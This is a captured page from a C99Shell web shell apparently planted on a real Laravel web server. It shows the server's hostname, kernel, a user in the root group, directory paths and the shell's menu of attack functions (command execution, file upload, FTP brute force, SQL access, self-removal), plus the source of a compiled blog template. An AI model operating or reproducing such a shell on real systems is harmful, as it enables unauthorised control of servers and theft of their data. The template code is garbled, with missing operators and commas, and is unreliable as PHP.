!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smab.picotech.app/public_html/storage/framework/views/   drwxr-xr-x
Free 29.42 GB of 117.98 GB (24.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     7f7f1f7bde2c22a6c507aacafa91cdd7.php (6.8 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?php $__env->startSection('content'); ?>

<!--==== START BREADCUMB ====-->
<section class="page-crumb">
    <ul class="cd-breadcrumb">
      <li><a href="<?php echo e(url('/')); ?>"><?php echo e(__('homepage')['title']); ?></a></li>
        <li class="current">Blog Detail</li>
    </ul>
</section>
<!--==== END BREADCUMB ====-->

<!--==== START CONTENT ====-->
<section class="mt-3" >
  <div class="row">
      <div class="col-md-12 col-xl-8 col-lg-8">
        <div class="blog-image">
          <img src="<?php echo e(asset('uploads')); ?>/blog/<?php echo e($data['blog']->image); ?>" alt="" >
        </div>
        <div class="my-3 d-flex justify-content-start align-items-center">
            <span class="blog-bottom-text"><i class="fas fa-user" style="color:#536372"></i>  Otrixadmin </span>
            <span class="blog-bottom-text mx-5"><i class="fas fa-clock" style="color:#536372"></i>   <?php echo e(date('d M Y',strtotime($data['blog']->created_at))); ?> </span>
        </div>
        <hr>
        <div class="my-3">
          <?php echo $data['blog']->description?>

        </div>
      </div>
      <div class="col-md-12 col-xl-4 col-lg-4">
          <div class="recent-blog-right-box">
            <div class="mt-0 mx-3  heading-xs heading-line">
              Recent Blog Post
            </div>
            <?php $__empty_1 true$__currentLoopData $data['recentBlog']; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key=>$blog): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); $__empty_1 false?>
              <?php if($key ): ?>
                  <div class="row  mx-2 ">
                    <div class="col-md-3 col-lg-3 col-xl-3 d-flex align-items-center">
                        <img src="<?php echo e(asset('uploads')); ?>/blog/<?php echo e($blog->image); ?>" alt="" width="100%">
                    </div>
                    <div class="col-md-9 col-lg-9 col-xl-9">
                      <div class="mx-3 my-3">
                        <a href="<?php echo e(route('blog.detail',['id' => $blog->id])); ?>" class="recent-blog-heading"><?php echo e($blog->title); ?></a>
                        <p class="recent-blog-shortdesc"><?php echo e(\Illuminate\Support\Str::limit($blog->short_description40$end='...')); ?></p>
                      </div>
                    </div>
                  </div>
              <?php endif; ?>
            <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); if ($__empty_1): ?>
              <p class="text-center ">No Blog Found!</p>
            <?php endif; ?>
        </div>

        <div class="author-box my-5">
          <div class="text-center">
              <img src=" <?php echo e(asset('frontend')); ?>/images/profile.png " alt="profile_picture">
              <div class="heading-xs  mt-3 mb-2">
                  Otrixadmin
              </div>
              <div>Founder & CEO of OtrixWeb</div>
              <div class="my-3">Lorem ipsum, or lipsum as it is sometimes known, is dummy text used in laying out print, graphic or web designs.</div>
              <div class="d-flex justify-content-center mt-5 mb-2 social-col">
                              <ul class="social-link-otrix flex-wrapper">
                                  <?php if(!empty(config('settingConfig.config_fb_url'))): ?>
                          <li><a href="<?php echo e(config('settingConfig.config_fb_url')); ?>" target="_blank"><i class="fa fa-facebook" aria-hidden="true"></i></a></li>
                        <?php endif; ?>
                        <?php if(!empty(config('settingConfig.config_linkedin_url'))): ?>
                          <li><a href="<?php echo e(config('settingConfig.config_linkedin_url')); ?>" target="_blank"><i class="fa fa-linkedin" aria-hidden="true"></i></a> </li>
                        <?php endif; ?>
                        <?php if(!empty(config('settingConfig.config_twitter_url'))): ?>
                          <li><a href="<?php echo e(config('settingConfig.config_twitter_url')); ?>" target="_blank" ><i class="fa fa-twitter" aria-hidden="true"></i></a> </li>
                        <?php endif; ?>
                        <?php if(!empty(config('settingConfig.config_insta_url'))): ?>
                          <li><a href="<?php echo e(config('settingConfig.config_insta_url')); ?>" target="_blank"><i class="fa fa-instagram" aria-hidden="true"></i></a> </li>
                        <?php endif; ?>
                        <?php if(!empty(config('settingConfig.config_youtube_url'))): ?>
                          <li><a href="<?php echo e(config('settingConfig.config_youtube_url')); ?>" target="_blank"><i class="fa fa-youtube-play" aria-hidden="true"></i></a> </li>
                        <?php endif; ?>
                              </ul>
                          </div>
          </div>
        </div>
        <?php
          $title 
$data['blog']->title;
          
$short_url =url()->current();
          
$url url()->current();

          
$twitter_params =
         
'?text=' urlencode($title) . '+-' .
         
'&amp;url=' urlencode($short_url) .
         
'&amp;counturl=' urlencode($url) .
         
'';

          
$link "http://twitter.com/share" $twitter_params "";

          
$text $title.' '.$data['blog']->short_description;
          
$produtURL =url()->current();
          
$wurl "https://api.whatsapp.com/send?text=".urlencode($text.' URL:'.$produtURL);
          
?>
        <div class="share-box mb-5">
          <div class="text-left">
              <div class="heading-xs heading-line mt-3 mb-2">
                  Share This Post
              </div>
              <div class="mb-3 ctnect-link d-flex justify-content-center " style="position:inherit;margin-top:20px;">
                  <ul class="social-link">
                      <li><a href="https://www.facebook.com/sharer.php?u=<?php echo e(url()->current()); ?>" target="_blank" class="facebook"><i class="fa fa-facebook" aria-hidden="true"></i> </a></li>
                      <li><a href="https://www.linkedin.com/shareArticle?mini=true&url=<?php echo e(url()->current()); ?>"  target="_blank" class="linkedin"><i class="fa fa-linkedin" aria-hidden="true"></i> </a> </li>
                      <li><a href="<?php echo e($link); ?>" class="twitter" target="_blank"><i class="fa fa-twitter" aria-hidden="true"></i> </a> </li>
                      <li><a href="<?php echo e($wurl); ?>" data-action="share/whatsapp/share" target="_blank" class="whatsapp"><i class="fa fa-whatsapp" aria-hidden="true"></i></a> </li>
                  </ul>
              </div>
            </div>
        </div>

      </div>
  </div>
</section>
<!--==== END CONTENT ====-->


<?php $__env->stopSection(); ?>

<?php echo $__env->make('frontend.layouts.app', ['class' => 'bg-white'], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data''__path']))->render(); ?><?php /**PATH /home/picotech/domains/smab.picotech.app/public_html/resources/views/frontend/blog/detail.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0051 ]--